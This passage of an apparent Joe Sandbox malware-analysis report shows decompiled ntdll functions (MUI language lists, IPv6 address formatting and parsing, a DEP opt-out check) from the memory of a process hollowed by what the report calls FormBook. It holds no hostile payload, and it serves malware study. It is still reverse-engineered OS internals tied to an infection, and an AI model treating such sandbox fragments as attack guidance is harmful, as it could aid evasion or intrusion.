                                                        						if(_a4 == _t318) {
                                                        							E01EAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                        							_v40 = _t318;
                                                        							_v20 = _t318;
                                                        						}
                                                        						if(_v8 != _t318) {
                                                        							E01EAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                        						}
                                                        						_v8 = _t318;
                                                        						goto L30;
                                                        					}
                                                        				}
                                                        				_t284 = _v24;
                                                        				_t322 = _t284 + 4;
                                                        				_push(_t284);
                                                        				_v48 = _t322;
                                                        				E01EC718A(_t284);
                                                        				_t339 = _t335 + 4;
                                                        				if(_t322 == _t318) {
                                                        					_v28 = _t318;
                                                        				} else {
                                                        					_v28 = E01EAE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                        				}
                                                        				if(_v28 == _t318) {
                                                        					_v48 = _t318;
                                                        					goto L58;
                                                        				} else {
                                                        					E01EA2340(_v28, _v8, _v24);
                                                        					_v16 = _v28;
                                                        					_a4 = _t318;
                                                        					_t288 = E01EBE679(_v28, _t332);
                                                        					_t335 = _t339 + 0x14;
                                                        					while(1) {
                                                        						_v12 = _t288;
                                                        						if(_t288 == _t318) {
                                                        							break;
                                                        						}
                                                        						_v12 = _v12 + 2;
                                                        						 *_v12 = 0;
                                                        						E01EAE2A8(_v12,  &_v68, _v16);
                                                        						if(E01EC5553(_t328,  &_v68,  &_v36) != 0) {
                                                        							_a4 = _a4 + 1;
                                                        						}
                                                        						_v16 = _v12;
                                                        						_t288 = E01EBE679(_v12, _t332);
                                                        						_pop(_t322);
                                                        					}
                                                        					_t296 = _v16;
                                                        					if( *_v16 != _t318) {
                                                        						E01EAE2A8(_t322,  &_v68, _t296);
                                                        						if(E01EC5553(_t328,  &_v68,  &_v36) != 0) {
                                                        							_a4 = _a4 + 1;
                                                        						}
                                                        					}
                                                        					if(_a4 == _t318) {
                                                        						E01EAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                        						_v48 = _t318;
                                                        						_v28 = _t318;
                                                        					}
                                                        					if(_v8 != _t318) {
                                                        						E01EAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                        					}
                                                        					_v8 = _t318;
                                                        					goto L17;
                                                        				}
                                                        			}
                                                        Instruction address column (one address per decompiled line above; 0x00000000 marks lines without an address of their own): 0x01ec8788 to 0x01ec8b59, plus out-of-line blocks at 0x01f11ad3 to 0x01f11c16.

                                                        APIs
                                                        Strings
                                                        • Kernel-MUI-Language-Disallowed, xrefs: 01EC8914
                                                        • Kernel-MUI-Language-Allowed, xrefs: 01EC8827
                                                        • Kernel-MUI-Number-Allowed, xrefs: 01EC87E6
                                                        • WindowsExcludedProcs, xrefs: 01EC87C1
                                                        • Kernel-MUI-Language-SKU, xrefs: 01EC89FC
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: _wcspbrk
                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                        • API String ID: 402402107-258546922
                                                        • Opcode ID: 50b6c51601a333298cad2194f0cb35a739cfefdc1ea9901d5e50c7dd9c628181
                                                        • Instruction ID: 0ad922e52241e5f0ef77e61fb266b590c932d3e416c231731779853aa789e8bc
                                                        • Opcode Fuzzy Hash: 50b6c51601a333298cad2194f0cb35a739cfefdc1ea9901d5e50c7dd9c628181
                                                        • Instruction Fuzzy Hash: 70F109B2D0024AEFDF11DF98CA80DEEBBB8FF18704F54546AE605A7210D735AA45DB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 38%
                                                        			E01EE13CB(intOrPtr* _a4, intOrPtr _a8) {
                                                        				char _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr* _v16;
                                                        				intOrPtr _v20;
                                                        				char _v24;
                                                        				intOrPtr _t71;
                                                        				signed int _t78;
                                                        				signed int _t86;
                                                        				char _t90;
                                                        				signed int _t91;
                                                        				signed int _t96;
                                                        				intOrPtr _t108;
                                                        				signed int _t114;
                                                        				void* _t115;
                                                        				intOrPtr _t128;
                                                        				intOrPtr* _t129;
                                                        				void* _t130;
                                                        
                                                        				_t129 = _a4;
                                                        				_t128 = _a8;
                                                        				_t116 = 0;
                                                        				_t71 = _t128 + 0x5c;
                                                        				_v8 = 8;
                                                        				_v20 = _t71;
                                                        				if( *_t129 == 0) {
                                                        					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                        						goto L5;
                                                        					} else {
                                                        						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                        						if(_t96 != 0) {
                                                        							L38:
                                                        							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                        								goto L5;
                                                        							} else {
                                                        								_push( *(_t129 + 0xf) & 0x000000ff);
                                                        								_push( *(_t129 + 0xe) & 0x000000ff);
                                                        								_push( *(_t129 + 0xd) & 0x000000ff);
                                                        								_t86 = E01ED7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                        								L36:
                                                        								return _t128 + _t86 * 2;
                                                        							}
                                                        						}
                                                        						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                        						if(_t114 == 0) {
                                                        							L33:
                                                        							_t115 = 0x1ea2926;
                                                        							L35:
                                                        							_push( *(_t129 + 0xf) & 0x000000ff);
                                                        							_push( *(_t129 + 0xe) & 0x000000ff);
                                                        							_push( *(_t129 + 0xd) & 0x000000ff);
                                                        							_push( *(_t129 + 0xc) & 0x000000ff);
                                                        							_t86 = E01ED7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                        							goto L36;
                                                        						}
                                                        						if(_t114 != 0xffff) {
                                                        							_t116 = 0;
                                                        							goto L38;
                                                        						}
                                                        						if(_t114 != 0) {
                                                        							_t115 = 0x1ea9cac;
                                                        							goto L35;
                                                        						}
                                                        						goto L33;
                                                        					}
                                                        				} else {
                                                        					L5:
                                                        					_a8 = _t116;
                                                        					_a4 = _t116;
                                                        					_v12 = _t116;
                                                        					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                        						if( *(_t129 + 0xa) == 0xfe5e) {
                                                        							_v8 = 6;
                                                        						}
                                                        					}
                                                        					_t90 = _v8;
                                                        					if(_t90 <= _t116) {
                                                        						L11:
                                                        						if(_a8 - _a4 <= 1) {
                                                        							_a8 = _t116;
                                                        							_a4 = _t116;
                                                        						}
                                                        						_t91 = 0;
                                                        						if(_v8 <= _t116) {
                                                        							L22:
                                                        							if(_v8 < 8) {
                                                        								_push( *(_t129 + 0xf) & 0x000000ff);
                                                        								_push( *(_t129 + 0xe) & 0x000000ff);
                                                        								_push( *(_t129 + 0xd) & 0x000000ff);
                                                        								_t128 = _t128 + E01ED7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                        							}
                                                        							return _t128;
                                                        						} else {
							L14:
                                                        							if(_a4 > _t91 || _t91 >= _a8) {
                                                        								if(_t91 != _t116 && _t91 != _a8) {
                                                        									_push(":");
                                                        									_push(_t71 - _t128 >> 1);
                                                        									_push(_t128);
                                                        									_t128 = _t128 + E01ED7707() * 2;
                                                        									_t71 = _v20;
                                                        									_t130 = _t130 + 0xc;
                                                        								}
                                                        								_t78 = E01ED7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                        								_t130 = _t130 + 0x10;
                                                        							} else {
                                                        								_push(L"::");
                                                        								_push(_t71 - _t128 >> 1);
                                                        								_push(_t128);
                                                        								_t78 = E01ED7707();
                                                        								_t130 = _t130 + 0xc;
                                                        								_t91 = _a8 - 1;
                                                        							}
                                                        							_t91 = _t91 + 1;
                                                        							_t128 = _t128 + _t78 * 2;
                                                        							_t71 = _v20;
                                                        							if(_t91 >= _v8) {
                                                        								goto L22;
                                                        							}
                                                        							_t116 = 0;
                                                        							goto L14;
                                                        						}
                                                        					} else {
                                                        						_t108 = 1;
                                                        						_v16 = _t129;
                                                        						_v24 = _t90;
                                                        						do {
                                                        							if( *_v16 == _t116) {
                                                        								if(_t108 - _v12 > _a8 - _a4) {
                                                        									_a4 = _v12;
                                                        									_a8 = _t108;
                                                        								}
                                                        								_t116 = 0;
                                                        							} else {
                                                        								_v12 = _t108;
                                                        							}
                                                        							_v16 = _v16 + 2;
                                                        							_t108 = _t108 + 1;
                                                        							_t26 =  &_v24;
                                                        							 *_t26 = _v24 - 1;
                                                        						} while ( *_t26 != 0);
                                                        						goto L11;
                                                        					}
                                                        				}
                                                        			}
                                                        0x01ee13d5
                                                        0x01ee13d9
                                                        0x01ee13dc
                                                        0x01ee13de
                                                        0x01ee13e1
                                                        0x01ee13e8
                                                        0x01ee13ee
                                                        0x01f0e8fd
                                                        0x00000000
                                                        0x01f0e921
                                                        0x01f0e921
                                                        0x01f0e928
                                                        0x01f0e982
                                                        0x01f0e98a
                                                        0x00000000
                                                        0x01f0e99a
                                                        0x01f0e99e
                                                        0x01f0e9a3
                                                        0x01f0e9a8
                                                        0x01f0e9b9
                                                        0x01f0e978
                                                        0x00000000
                                                        0x01f0e978
                                                        0x01f0e98a
                                                        0x01f0e92a
                                                        0x01f0e931
                                                        0x01f0e944
                                                        0x01f0e944
                                                        0x01f0e950
                                                        0x01f0e954
                                                        0x01f0e959
                                                        0x01f0e95e
                                                        0x01f0e963
                                                        0x01f0e970
                                                        0x00000000
                                                        0x01f0e975
                                                        0x01f0e93b
                                                        0x01f0e980
                                                        0x00000000
                                                        0x01f0e980
                                                        0x01f0e942
                                                        0x01f0e94b
                                                        0x00000000
                                                        0x01f0e94b
                                                        0x00000000
                                                        0x01f0e942
                                                        0x01ee13f4
                                                        0x01ee13f4
                                                        0x01ee13f9
                                                        0x01ee13fc
                                                        0x01ee13ff
                                                        0x01ee1406
                                                        0x01f0e9cc
                                                        0x01f0e9d2
                                                        0x01f0e9d2
                                                        0x01f0e9cc
                                                        0x01ee140c
                                                        0x01ee1411
                                                        0x01ee1431
                                                        0x01ee143a
                                                        0x01ee143c
                                                        0x01ee143f
                                                        0x01ee143f
                                                        0x01ee1442
                                                        0x01ee1447
                                                        0x01ee14a8
                                                        0x01ee14ac
                                                        0x01f0e9e2
                                                        0x01f0e9e7
                                                        0x01f0e9ec
                                                        0x01f0ea05
                                                        0x01f0ea05
                                                        0x00000000
                                                        0x01ee1449
                                                        0x00000000
                                                        0x01ee1449
                                                        0x01ee144c
                                                        0x01ee1459
                                                        0x01ee1462
                                                        0x01ee1469
                                                        0x01ee146a
                                                        0x01ee1470
                                                        0x01ee1473
                                                        0x01ee1476
                                                        0x01ee1476
                                                        0x01ee1490
                                                        0x01ee1495
                                                        0x01ee138e
                                                        0x01ee1390
                                                        0x01ee1397
                                                        0x01ee1398
                                                        0x01ee1399
                                                        0x01ee13a1
                                                        0x01ee13a4
                                                        0x01ee13a4
                                                        0x01ee1498
                                                        0x01ee149c
                                                        0x01ee149f
                                                        0x01ee14a2
                                                        0x00000000
                                                        0x00000000
                                                        0x01ee14a4
                                                        0x00000000
                                                        0x01ee14a4
                                                        0x01ee1413
                                                        0x01ee1415
                                                        0x01ee1416
                                                        0x01ee1419
                                                        0x01ee141c
                                                        0x01ee1422
                                                        0x01ee13b7
                                                        0x01ee13bc
                                                        0x01ee13bf
                                                        0x01ee13bf
                                                        0x01ee13c2
                                                        0x01ee1424
                                                        0x01ee1424
                                                        0x01ee1424
                                                        0x01ee1427
                                                        0x01ee142b
                                                        0x01ee142c
                                                        0x01ee142c
                                                        0x01ee142c
                                                        0x00000000
                                                        0x01ee141c
                                                        0x01ee1411

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: 94d3a7bb015312427fb08d61ed0e6e25db20eb27640d4cf93e4207e6d0e8564b
                                                        • Instruction ID: 54f15f2324d681a002930ed55a772657568878527bb11132b4be8bdfdea27e66
                                                        • Opcode Fuzzy Hash: 94d3a7bb015312427fb08d61ed0e6e25db20eb27640d4cf93e4207e6d0e8564b
                                                        • Instruction Fuzzy Hash: 4D6156B1D00696AACB35DF5DC8848BEBBF5EF98304B54D42DE5D64B641D330A680CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 64%
                                                        			E01ED7EFD(void* __ecx, intOrPtr _a4) {
                                                        				signed int _v8;
                                                        				char _v540;
                                                        				unsigned int _v544;
                                                        				signed int _v548;
                                                        				intOrPtr _v552;
                                                        				char _v556;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t33;
                                                        				void* _t38;
                                                        				unsigned int _t46;
                                                        				unsigned int _t47;
                                                        				unsigned int _t52;
                                                        				intOrPtr _t56;
                                                        				unsigned int _t62;
                                                        				void* _t69;
                                                        				void* _t70;
                                                        				intOrPtr _t72;
                                                        				signed int _t73;
                                                        				void* _t74;
                                                        				void* _t75;
                                                        				void* _t76;
                                                        				void* _t77;
                                                        
                                                        				_t33 =  *0x1f82088; // 0x76a06099
                                                        				_v8 = _t33 ^ _t73;
                                                        				_v548 = _v548 & 0x00000000;
                                                        				_t72 = _a4;
                                                        				if(E01ED7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                        					__eflags = _v548;
                                                        					if(_v548 == 0) {
                                                        						goto L1;
                                                        					}
                                                        					_t62 = _t72 + 0x24;
                                                        					E01EF3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                        					_t71 = 0x214;
                                                        					_v544 = 0x214;
                                                        					E01EADFC0( &_v540, 0, 0x214);
                                                        					_t75 = _t74 + 0x20;
                                                        					_t46 =  *0x1f84218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                        					__eflags = _t46;
                                                        					if(_t46 == 0) {
                                                        						goto L1;
                                                        					}
                                                        					_t47 = _v544;
                                                        					__eflags = _t47;
                                                        					if(_t47 == 0) {
                                                        						goto L1;
                                                        					}
                                                        					__eflags = _t47 - 0x214;
                                                        					if(_t47 >= 0x214) {
                                                        						goto L1;
                                                        					}
                                                        					_push(_t62);
                                                        					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                        					E01EF3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                        					_t52 = E01EB0D27( &_v540, L"Execute=1");
                                                        					_t76 = _t75 + 0x1c;
                                                        					_push(_t62);
                                                        					__eflags = _t52;
                                                        					if(_t52 == 0) {
                                                        						E01EF3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                        						_t71 =  &_v540;
                                                        						_t56 = _t73 + _v544 - 0x218;
                                                        						_t77 = _t76 + 0x14;
                                                        						_v552 = _t56;
                                                        						__eflags = _t71 - _t56;
                                                        						if(_t71 >= _t56) {
                                                        							goto L1;
                                                        						} else {
                                                        							goto L10;
                                                        						}
                                                        						while(1) {
                                                        							L10:
                                                        							_t62 = E01EB8375(_t71, 0x20);
                                                        							_pop(_t69);
                                                        							__eflags = _t62;
                                                        							if(__eflags != 0) {
                                                        								__eflags = 0;
                                                        								 *_t62 = 0;
                                                        							}
                                                        							E01EF3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                        							_t77 = _t77 + 0x10;
                                                        							E01F1E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                        							__eflags = _t62;
                                                        							if(_t62 == 0) {
                                                        								goto L1;
                                                        							}
                                                        							_t31 = _t62 + 2; // 0x2
                                                        							_t71 = _t31;
                                                        							__eflags = _t71 - _v552;
                                                        							if(_t71 >= _v552) {
                                                        								goto L1;
                                                        							}
                                                        						}
                                                        					}
                                                        					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                        					_push(3);
                                                        					_push(0x55);
                                                        					E01EF3F92();
                                                        					_t38 = 1;
                                                        					L2:
                                                        					return E01EAE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                        				}
                                                        				L1:
                                                        				_t38 = 0;
                                                        				goto L2;
                                                        			}
                                                        0x01ed7f08
                                                        0x01ed7f0f
                                                        0x01ed7f12
                                                        0x01ed7f1b
                                                        0x01ed7f31
                                                        0x01ef3ead
                                                        0x01ef3eb4
                                                        0x00000000
                                                        0x00000000
                                                        0x01ef3eba
                                                        0x01ef3ecd
                                                        0x01ef3ed2
                                                        0x01ef3ee1
                                                        0x01ef3ee7
                                                        0x01ef3eec
                                                        0x01ef3f12
                                                        0x01ef3f18
                                                        0x01ef3f1a
                                                        0x00000000
                                                        0x00000000
                                                        0x01ef3f20
                                                        0x01ef3f26
                                                        0x01ef3f28
                                                        0x00000000
                                                        0x00000000
                                                        0x01ef3f2e
                                                        0x01ef3f30
                                                        0x00000000
                                                        0x00000000
                                                        0x01ef3f3a
                                                        0x01ef3f3b
                                                        0x01ef3f53
                                                        0x01ef3f64
                                                        0x01ef3f69
                                                        0x01ef3f6c
                                                        0x01ef3f6d
                                                        0x01ef3f6f
                                                        0x01efe304
                                                        0x01efe30f
                                                        0x01efe315
                                                        0x01efe31e
                                                        0x01efe321
                                                        0x01efe327
                                                        0x01efe329
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01efe32f
                                                        0x01efe32f
                                                        0x01efe337
                                                        0x01efe33a
                                                        0x01efe33b
                                                        0x01efe33d
                                                        0x01efe33f
                                                        0x01efe341
                                                        0x01efe341
                                                        0x01efe34e
                                                        0x01efe353
                                                        0x01efe358
                                                        0x01efe35d
                                                        0x01efe35f
                                                        0x00000000
                                                        0x00000000
                                                        0x01efe365
                                                        0x01efe365
                                                        0x01efe368
                                                        0x01efe36e
                                                        0x00000000
                                                        0x00000000
                                                        0x01efe374
                                                        0x01efe32f
                                                        0x01ef3f75
                                                        0x01ef3f7a
                                                        0x01ef3f7c
                                                        0x01ef3f7e
                                                        0x01ef3f86
                                                        0x01ed7f39
                                                        0x01ed7f47
                                                        0x01ed7f47
                                                        0x01ed7f37
                                                        0x01ed7f37
                                                        0x00000000

                                                        APIs
                                                        • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 01EF3F12
                                                        Strings
                                                        • ExecuteOptions, xrefs: 01EF3F04
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01EF3F4A
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01EF3EC4
                                                        • Execute=1, xrefs: 01EF3F5E
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01EFE2FB
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01EFE345
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01EF3F75
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: BaseDataModuleQuery
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 3901378454-484625025
                                                        • Opcode ID: 5cad5bee7d41319acc5fe5dc4141c80787fa559203e682214172455f2927ec08
                                                        • Instruction ID: 6c2aa99a0e5676a322f587c675493676257ea84aba9aed42cb2c12cf36d085e2
                                                        • Opcode Fuzzy Hash: 5cad5bee7d41319acc5fe5dc4141c80787fa559203e682214172455f2927ec08
                                                        • Instruction Fuzzy Hash: 3941C632A4025D7AEB319B94DCC5FEE73BDAB14704F4014A9FB45E6081E670AA858BA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			/* Decompiler output recovered from the memory dump of the hollowed wuapp
                                                        			 * process. Like the preceding function (its "CLIENT(ntdll):" strings mark
                                                        			 * it as ntdll's loader code honouring an ExecuteOptions / DEP opt-out),
                                                        			 * this is ordinary ntdll code mapped into the injected process, not code
                                                        			 * written by the FormBook operator; it is not suitable as a detection
                                                        			 * signature for the sample. Judging by its behaviour (an inference from
                                                        			 * the code, not something the report states) it is ntdll's IPv6
                                                        			 * string-to-address parser: 0x3a and 0x2e are ':' and '.', the
                                                        			 * E01EE06BA/E01EE0A5B calls classify decimal and hexadecimal digits,
                                                        			 * E01EE0CFA converts the current digit run (base 0xa or 0x10), _v8 counts
                                                        			 * 16-bit groups (more than 8 is rejected), _v12 counts digits in the
                                                        			 * current group (at most 4 hex or 3 decimal), _v20 is the output word
                                                        			 * index, _v24 counts the dots of an embedded IPv4 tail (each octet must be
                                                        			 * <= 0xff), _v32 records where "::" occurred so the memmove/memset pair
                                                        			 * (E01EB8980/E01EADFC0) can expand it, *_a8 receives a pointer to the
                                                        			 * terminating character, and 0xc000000d is STATUS_INVALID_PARAMETER. */
                                                        			E01EE0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				signed int _v16;
                                                        				signed int _v20;
                                                        				signed int _v24;
                                                        				signed int _v28;
                                                        				signed int _v32;
                                                        				void* _t108;
                                                        				void* _t116;
                                                        				char _t120;
                                                        				short _t121;
                                                        				void* _t128;
                                                        				intOrPtr* _t130;
                                                        				char _t132;
                                                        				short _t133;
                                                        				intOrPtr _t141;
                                                        				signed int _t156;
                                                        				signed int _t174;
                                                        				intOrPtr _t177;
                                                        				intOrPtr* _t179;
                                                        				intOrPtr _t180;
                                                        				void* _t183;
                                                        				/* temporaries the decompiler uses below without declaring them */
                                                        				signed int _t123;
                                                        				intOrPtr _t124, _t125, _t135, _t136, _t142, _t178;
                                                        
                                                        				_t179 = _a4;
                                                        				_t141 =  *_t179;
                                                        				_v16 = 0;
                                                        				_v28 = 0;
                                                        				_v8 = 0;
                                                        				_v24 = 0;
                                                        				_v12 = 0;
                                                        				_v32 = 0;
                                                        				_v20 = 0;
                                                        				if(_t141 == 0) {
                                                        					L41:
                                                        					 *_a8 = _t179;
                                                        					_t180 = _v24;
                                                        					if(_t180 != 0) {
                                                        						if(_t180 != 3) {
                                                        							goto L6;
                                                        						}
                                                        						_v8 = _v8 + 1;
                                                        					}
                                                        					_t174 = _v32;
                                                        					if(_t174 == 0) {
                                                        						if(_v8 == 7) {
                                                        							goto L43;
                                                        						}
                                                        						goto L6;
                                                        					}
                                                        					L43:
                                                        					if(_v16 != 1) {
                                                        						if(_v16 != 2) {
                                                        							goto L6;
                                                        						}
                                                        						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                        						L47:
                                                        						if(_t174 != 0) {
                                                        							E01EB8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                        							_t116 = 8;
                                                        							E01EADFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                        						}
                                                        						return 0;
                                                        					}
                                                        					if(_t180 != 0) {
                                                        						if(_v12 > 3) {
                                                        							goto L6;
                                                        						}
                                                        						_t120 = E01EE0CFA(_v28, 0, 0xa);
                                                        						_t183 = _t183 + 0xc;
                                                        						if(_t120 > 0xff) {
                                                        							goto L6;
                                                        						}
                                                        						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                        						goto L47;
                                                        					}
                                                        					if(_v12 > 4) {
                                                        						goto L6;
                                                        					}
                                                        					_t121 = E01EE0CFA(_v28, _t180, 0x10);
                                                        					_t183 = _t183 + 0xc;
                                                        					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                        					goto L47;
                                                        				} else {
                                                        					while(1) {
                                                        						_t123 = _v16;
                                                        						if(_t123 == 0) {
                                                        							goto L7;
                                                        						}
                                                        						_t108 = _t123 - 1;
                                                        						if(_t108 != 0) {
                                                        							goto L1;
                                                        						}
                                                        						_t178 = _t141;
                                                        						if(E01EE06BA(_t108, _t141) == 0 || _t135 == 0) {
                                                        							if(E01EE06BA(_t135, _t178) == 0 || E01EE0A5B(_t136, _t178) == 0) {
                                                        								if(_t141 != 0x3a) {
                                                        									if(_t141 == 0x2e) {
                                                        										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                        											goto L41;
                                                        										} else {
                                                        											_v24 = _v24 + 1;
                                                        											L27:
                                                        											_v16 = _v16 & 0x00000000;
                                                        											L28:
                                                        											if(_v28 == 0) {
                                                        												goto L20;
                                                        											}
                                                        											_t177 = _v24;
                                                        											if(_t177 != 0) {
                                                        												if(_v12 > 3) {
                                                        													L6:
                                                        													return 0xc000000d;
                                                        												}
                                                        												_t132 = E01EE0CFA(_v28, 0, 0xa);
                                                        												_t183 = _t183 + 0xc;
                                                        												if(_t132 > 0xff) {
                                                        													goto L6;
                                                        												}
                                                        												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                        												goto L20;
                                                        											}
                                                        											if(_v12 > 4) {
                                                        												goto L6;
                                                        											}
                                                        											_t133 = E01EE0CFA(_v28, 0, 0x10);
                                                        											_t183 = _t183 + 0xc;
                                                        											_v20 = _v20 + 1;
                                                        											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                        											goto L20;
                                                        										}
                                                        									}
                                                        									goto L41;
                                                        								}
                                                        								if(_v24 > 0 || _v8 > 6) {
                                                        									goto L41;
                                                        								} else {
                                                        									_t130 = _t179 + 1;
                                                        									if( *_t130 == _t141) {
                                                        										if(_v32 != 0) {
                                                        											goto L41;
                                                        										}
                                                        										_v32 = _v8 + 1;
                                                        										_t156 = 2;
                                                        										_v8 = _v8 + _t156;
                                                        										L34:
                                                        										_t179 = _t130;
                                                        										_v16 = _t156;
